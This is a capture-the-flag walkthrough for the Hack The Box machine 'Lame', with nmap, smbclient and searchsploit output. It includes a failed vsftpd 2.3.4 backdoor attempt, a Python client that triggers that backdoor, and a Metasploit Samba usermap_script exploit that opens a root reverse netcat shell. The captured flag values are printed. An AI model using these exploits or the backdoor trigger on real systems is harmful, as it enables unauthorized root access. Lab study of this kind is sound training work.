HTB | Lame

 

Walkthrough


Time to Root Machine: ~15min
Write-up Date(s): 1/1/2021
Last Edited: 1/9/2021

 
 
Assuming we are already connected to HTB's VPN, start with a full TCP port scan of 10.10.10.3 with Nmap (-p- for all 65535 ports, -A for version detection, default scripts, OS detection and traceroute, -T4 for speed):
┌──(root💀kali)-[~]
└─# nmap -p- -A -T4 10.10.10.3
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-23 12:41 EDT
Nmap scan report for 10.10.10.3
Host is up (0.084s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.159
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: DD-WRT v24-sp1 (Linux 2.4.36) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), Linux 2.6.23 (92%), Arris TG862G/CT cable modem (92%), Belkin N300 WAP (Linux 2.6.30) (92%), Control4 HC-300 home controller (92%), D-Link DAP-1522 WAP, or Xerox WorkCentre Pro 245 or 6556 printer (92%), Dell Integrated Remote Access Controller (iDRAC6) (92%), Linksys WET54GS5 WAP, Tranzeo TR-CPQ-19f WAP, or Xerox WorkCentre Pro 265 printer (92%), Linux 2.4.21 - 2.4.31 (likely embedded) (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h05m09s, deviation: 2h49m43s, median: 5m08s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-04-23T12:48:27-04:00
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 139/tcp)
HOP RTT       ADDRESS
1   49.92 ms  10.10.16.1
2   100.37 ms 10.10.10.3

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.00 seconds

Let's do a quick breakdown of the scan results and point out the important information:
Port 21 - FTP (vsftpd 2.3.4), anonymous login allowed
Port 22 - SSH (OpenSSH 4.7p1 Debian 8ubuntu1)
Ports 139 & 445 - SMB server (Samba smbd 3.0.20-Debian), message signing disabled
Port 3632 - Distributed compiler (distccd v1, (GNU) 4.2.4)
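
Reading five port lines by hand is fine, but the same triage is worth scripting. The following is an added Python example, not part of the original write-up: it parses nmap's normal output into ports, version banners and NSE results, reduces each banner to a searchsploit query of the kind used later in this write-up, and flags the anonymous FTP login and the disabled SMB signing. SAMPLE_SCAN is the scan output above, trimmed; the function names and the version-reduction heuristic are mine.

```python
import re

# Constructed sample: port table and host-script lines copied from the scan above,
# trimmed to what the parser needs, so this runs without a target.
SAMPLE_SCAN = """\
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.16.159
|_End of status
22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))

Host script results:
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")          # "21/tcp   open  ftp   vsftpd 2.3.4"
SCRIPT_RE = re.compile(r"^\|[_ ]([A-Za-z0-9-]+):\s*(.*)$")                 # "|_ftp-anon: ..." / "| ssh-hostkey: "
FIELD_RE = re.compile(r"^\|[_ ]\s+([A-Za-z][A-Za-z0-9_ ]*?):\s*(.*)$")     # "|   message_signing: disabled ..."
VERSION_RE = re.compile(r"^v?(\d+(?:\.\d+)*)")                             # leading dotted number of a token


def parse_nmap(text):
    """Return {"ports": [...], "host_scripts": {...}} from nmap's normal (-oN / stdout) output."""
    scan = {"ports": [], "host_scripts": {}}
    scripts = None   # dict receiving NSE output: the current port's, or the host's
    name = None      # NSE script whose indented key/value lines we are inside
    for line in text.splitlines():
        if line.startswith("Host script results"):
            scripts, name = scan["host_scripts"], None
            continue
        m = PORT_RE.match(line)
        if m:
            port = {"port": int(m.group(1)), "proto": m.group(2), "state": m.group(3),
                    "service": m.group(4), "version": m.group(5).strip(), "scripts": {}}
            scan["ports"].append(port)
            scripts, name = port["scripts"], None
            continue
        if scripts is None:
            continue
        m = SCRIPT_RE.match(line)
        if m:
            name = m.group(1)
            scripts[name] = {"summary": m.group(2).strip(), "fields": {}}
            continue
        m = FIELD_RE.match(line)
        if m and name is not None:
            scripts[name]["fields"][m.group(1).strip()] = m.group(2).strip()
    return scan


def search_term(version):
    """Reduce a banner to "product dotted-version" for searchsploit: "OpenSSH 4.7p1 Debian 8ubuntu1"
    becomes "OpenSSH 4.7"; a banner with no dotted version ("distccd v1 ...") keeps only the product."""
    tokens = version.split()
    for i, tok in enumerate(tokens):
        m = VERSION_RE.match(tok)
        if m and i > 0:
            ver = m.group(1)
            return f"{tokens[0]} {ver}" if "." in ver else tokens[0]
    return tokens[0] if tokens else ""


def findings(scan):
    """The checklist a tester wants from the scan: one searchsploit query per open port plus NSE red flags."""
    out = []
    for p in scan["ports"]:
        if p["state"] != "open":
            continue
        term = search_term(p["version"]) or p["service"]
        out.append(f'{p["port"]}/{p["proto"]} {p["service"]}: searchsploit "{term}"')
        anon = p["scripts"].get("ftp-anon")
        if anon and "allowed" in anon["summary"]:
            out.append(f'{p["port"]}/{p["proto"]}: anonymous FTP login allowed')
    signing = scan["host_scripts"].get("smb-security-mode", {}).get("fields", {}).get("message_signing", "")
    if signing.startswith("disabled"):
        out.append("SMB: message signing disabled")
    return out


if __name__ == "__main__":
    for item in findings(parse_nmap(SAMPLE_SCAN)):
        print(item)
```

Feed it a saved `nmap -oN` file instead of SAMPLE_SCAN for a real engagement. The heuristic keeps the product name plus the dotted version and drops suffixes such as p1 or -Debian, which is close to what gets typed into searchsploit further down; it deliberately errs on the side of a broader query, since a too-specific one returns nothing.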

With this information we can enumerate each port one by one and see what turns up. We start with port 21, FTP. As the ftp-anon script result shows, the server accepts anonymous logins, so let's fire up an FTP client and log in as anonymous (any password is accepted):
┌──(root💀kali)-[~]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 .
drwxr-xr-x    2 0        65534        4096 Mar 17  2010 ..
226 Directory send OK.

The anonymous FTP root is an empty directory (owned by uid 0, group 65534/nogroup), so there is nothing to pull down; let's keep going.

SSH won't give us much on its own; the banner only confirms what nmap already reported (OpenSSH 4.7p1 Debian 8ubuntu1), so let's move on to the Samba ports, 139 and 445, and list the shares with smbclient. The --option='client min protocol=NT1' is needed because this Samba 3.0.20 only speaks SMB1, which modern smbclient refuses by default (nmap's smb2-time script also failed to negotiate SMB2 above):
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (lame server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            LAME
The tmp share's comment, oh noes!, looks like a tease rather than a hint, but let's check it anyway:
┌──(root💀kali)-[~]
└─# smbclient //10.10.10.3/tmp --option='client min protocol=NT1'
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Apr 23 13:04:46 2021
  ..                                 DR        0  Sat Oct 31 02:33:58 2020
  .ICE-unix                          DH        0  Fri Apr 23 12:44:45 2021
  vmware-root                        DR        0  Fri Apr 23 12:45:18 2021
  .X11-unix                          DH        0  Fri Apr 23 12:45:12 2021
  .X0-lock                           HR       11  Fri Apr 23 12:45:12 2021
  5562.jsvc_up                        R        0  Fri Apr 23 12:45:50 2021
  vgauthsvclog.txt.0                  R     1600  Fri Apr 23 12:44:43 2021

		7282168 blocks of size 1024. 5386552 blocks available
smb: \> exit
Nothing useful in there: from the X11 and ICE sockets and the VMware log it looks like the system's /tmp. Access to IPC$ and ADMIN$ was denied, so I won't show those.
Basic enumeration of each service didn't get us anywhere, so let's turn to the exact software versions nmap reported and check each of them against Exploit-DB with searchsploit. First, vsftpd 2.3.4:
┌──(root💀kali)-[~]
└─# searchsploit vsftpd 2.3.4
----------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
vsftpd 2.3.4 - Backdoor Command Execution                                                                        | unix/remote/49757.py
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                           | unix/remote/17491.rb
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Interesting! That is the backdoor that was planted in the vsftpd 2.3.4 download archive in 2011, and Metasploit ships a module for it; a quick Google search turns up Rapid7's module page with the steps. Let's launch msfconsole and see whether the target's build is the trojaned one:
┌──(root💀kali)-[~]
└─# msfconsole
[!] The following modules could not be loaded!..-
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V5                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 5 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           https://metasploit.com


       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   21               yes       The target port (TCP)


Payload options (cmd/unix/interact):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run

[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
That was a bust. The module sends a USER string containing ":)" and then connects to TCP 6200, where a backdoored build spawns a shell; here the daemon answered the USER normally and nothing was listening on 6200 (nmap reported every port other than the five open ones as filtered), so no session was created.
Let's move on and check port 22 (SSH). Typically there isn't much to find, but a quick searchsploit costs nothing:
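To see exactly what the module is checking, and what a hit would have looked like, here is an added Python example (mine, not from the write-up or from Metasploit). The client side sends the same trigger the module does: a USER argument containing ":)", the two bytes the trojaned vsftpd 2.3.4 source checks for before binding TCP 6200 and execing /bin/sh on whatever connects. Since nobody should run the real backdoor to test a script, FakeVsftpd is a constructed stand-in that imitates either a trojaned build or a clean one on loopback; its ephemeral ports, the function names and the "[simulated shell]" echo are assumptions of this example.

```python
import socket
import threading
import time

TRIGGER = b":)"        # bytes 0x3a 0x29; the trojaned str.c calls the backdoor when it sees them in USER
BACKDOOR_PORT = 6200   # port the real backdoor binds; the simulation below picks a free port instead


def trigger_vsftpd_backdoor(host, ftp_port=21, backdoor_port=BACKDOOR_PORT, timeout=3.0):
    """Do what the Metasploit module does: send a USER containing ':)', then try the backdoor port.
    Returns a socket connected to the backdoor shell, or None when nothing is listening there."""
    with socket.create_connection((host, ftp_port), timeout=timeout) as ctl:
        ctl.recv(1024)                                   # 220 (vsFTPd 2.3.4)
        ctl.sendall(b"USER x" + TRIGGER + b"\r\n")
        ctl.sendall(b"PASS x\r\n")
        # Do not wait for "331": a backdoored build never sends it, because its child
        # process is now blocked in accept() on the backdoor port.
    deadline = time.monotonic() + timeout
    while time.monotonic() < deadline:
        try:
            return socket.create_connection((host, backdoor_port), timeout=timeout)
        except OSError:                                  # refused or filtered: keep trying until the deadline
            time.sleep(0.1)
    return None


def _free_port(host):
    with socket.socket() as s:
        s.bind((host, 0))
        return s.getsockname()[1]


class FakeVsftpd(threading.Thread):
    """Constructed stand-in for vsftpd 2.3.4, not vsftpd's code. backdoored=True imitates the trojaned
    tarball: a USER containing ':)' opens a second listener and serves a (simulated) shell on it instead
    of answering 331. backdoored=False imitates a clean build, which is how the target behaved."""

    def __init__(self, backdoored, host="127.0.0.1"):
        super().__init__(daemon=True)
        self.backdoored, self.host = backdoored, host
        self._ctl = socket.socket()
        self._ctl.bind((host, 0))
        self._ctl.listen(1)
        self.ftp_port = self._ctl.getsockname()[1]
        self.backdoor_port = _free_port(host)

    def run(self):
        conn, _ = self._ctl.accept()
        self._ctl.close()
        try:
            with conn:
                conn.sendall(b"220 (vsFTPd 2.3.4)\r\n")
                user = conn.recv(1024)
                if self.backdoored and TRIGGER in user:
                    self._serve_backdoor()               # control connection is left hanging, as in the real thing
                    return
                conn.sendall(b"331 Please specify the password.\r\n")
                conn.recv(1024)                          # PASS
                conn.sendall(b"530 Login incorrect.\r\n")
        except OSError:
            pass

    def _serve_backdoor(self):
        with socket.socket() as lst:
            lst.bind((self.host, self.backdoor_port))
            lst.listen(1)
            sh, _ = lst.accept()
            with sh:
                cmd = sh.recv(1024)                      # the real backdoor execs /bin/sh on this socket; we only echo
                sh.sendall(b"[simulated shell] " + cmd)


if __name__ == "__main__":
    for backdoored in (True, False):
        srv = FakeVsftpd(backdoored)
        srv.start()
        shell = trigger_vsftpd_backdoor(srv.host, srv.ftp_port, srv.backdoor_port)
        print("trojaned build:" if backdoored else "clean build:",
              f"shell on port {srv.backdoor_port}" if shell else "nothing on the backdoor port")
        if shell:
            shell.close()
```

The clean-build run is the failure mode seen above: the daemon answers the USER and the connect to the backdoor port is refused until the deadline, which is all the module means by "no session was created". A "331" coming back to the trigger is itself a tell that the backdoor did not fire, since the trojaned code never gets as far as sending it.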
┌──(root💀kali)-[~]
└─# searchsploit openssh 4.7
----------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSSH 2.3 < 7.7 - Username Enumeration                                                                         | linux/remote/45233.py
OpenSSH 2.3 < 7.7 - Username Enumeration (PoC)                                                                   | linux/remote/45210.py
OpenSSH < 6.6 SFTP (x64) - Command Execution                                                                     | linux_x86-64/remote/45000.c
OpenSSH < 6.6 SFTP - Command Execution                                                                           | linux/remote/45001.py
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation             | linux/local/40962.txt
OpenSSH < 7.4 - agent Protocol Arbitrary Library Loading                                                         | linux/remote/40963.txt
OpenSSH < 7.7 - User Enumeration (2)                                                                             | linux/remote/45939.py
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There are hits, but none that help us here: 45233, 45210 and 45939 are username-enumeration scripts, useful only once we have candidate names and something to do with them; 40962 is a local privilege escalation; 40963 needs a forwarded ssh-agent; and the SFTP command-execution entries (45000, 45001) need an authenticated account. So we move on.
Next, Samba smbd 3.0.20-Debian on ports 139 and 445. Searching for the version prefix rather than the full string keeps the results broad:
┌──(root💀kali)-[~]
└─# searchsploit samba 3.0.2
----------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                   |  Path
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)                                 | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)                                               | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                           | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit)                                         | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow                                                         | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC)                                                | multiple/dos/5712.pl
Samba < 3.0.20 - Remote Heap Overflow                                                                            | linux/remote/7701.txt
Samba < 3.0.20 - Remote Heap Overflow                                                                            | linux/remote/7701.txt
Samba < 3.6.2 (x86) - Denial of Service (PoC)                                                                    | linux_x86/dos/36741.py
----------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Another promising find: Samba 3.0.20 < 3.0.25rc3 - 'Username map script' Command Execution (CVE-2007-2447), and the target's 3.0.20 sits squarely in that range. Rapid7 has a Metasploit module for this one as well, so let's launch msfconsole again:
┌──(root💀kali)-[~]
└─# msfconsole
[!] The following modules could not be loaded!..-
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/host_id.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/exchange_enum.go
[!] 	/usr/share/metasploit-framework/modules/auxiliary/scanner/msmail/onprem_enum.go
[!] Please see /root/.msf4/logs/framework.log for details.
                                                  
Call trans opt: received. 2-19-98 13:24:18 REC:Loc

     Trace program: running

           wake up, Neo...
        the matrix has you
      follow the white rabbit.

          knock, knock, Neo.

                        (`.         ,-,
                        ` `.    ,;' /
                         `.  ,'/ .'
                          `. X /.'
                .-;--''--.._` ` (
              .'            /   `
             ,           ` '   Q '
             ,         ,   `._    \
          ,.|         '     `-.;_'
          :  . `  ;    `  ` --,.._;
           ' `    ,   )   .'
              `._ ,  '   /_
                 ; ,''-,;' ``-
                  ``-..__``--`

                             https://metasploit.com


       =[ metasploit v6.0.40-dev                          ]
+ -- --=[ 2119 exploits - 1138 auxiliary - 360 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: Save the current environment with the 
save command, future console restarts will use this 
environment again

msf6 > use exploit/multi/samba/usermap_script
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
msf6 exploit(multi/samba/usermap_script) > options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.2.15        yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST tun0
LHOST => tun0
msf6 exploit(multi/samba/usermap_script) > run

[*] Started reverse TCP handler on 10.10.16.159:4444 
[*] Command shell session 1 opened (10.10.16.159:4444 -> 10.10.10.3:44462) at 2021-04-23 13:04:50 -0400

whoami 
root
hostname
lame
And... WE ARE IN, and straight to root: the injected command runs with smbd's privileges, and smbd runs as root, so there is no separate privilege-escalation step on this box. Note the LHOST change: the default 10.0.2.15 is the attacking VM's NAT address, which the target cannot reach, so we pointed the handler at the tun0 VPN interface (10.10.16.159) instead.
Let's grab both flags and call it a day:
pwd
/
cd root
cat root.txt
44f9458452449e93a813cabaa4fa1dc0

cd ..
pwd
/
cd home
ls -al
total 24
drwxr-xr-x  6 root    root    4096 Mar 14  2017 .
drwxr-xr-x 21 root    root    4096 Oct 31 02:33 ..
drwxr-xr-x  2 root    nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x  2 makis   makis   4096 Mar 14  2017 makis
drwxr-xr-x  2 service service 4096 Apr 16  2010 service
drwxr-xr-x  3    1001    1001 4096 May  7  2010 user
cd makis
ls -al
total 28
drwxr-xr-x 2 makis makis 4096 Mar 14  2017 .
drwxr-xr-x 6 root  root  4096 Mar 14  2017 ..
-rw------- 1 makis makis 1107 Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2928 Mar 14  2017 .bashrc
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 Apr 23 12:45 user.txt
cat user.txt
9dbf6b03581f642c7d5f3afb09ac7f2a
ROOT FLAG: 44f9458452449e93a813cabaa4fa1dc0
USER [MAKIS] FLAG: 9dbf6b03581f642c7d5f3afb09ac7f2a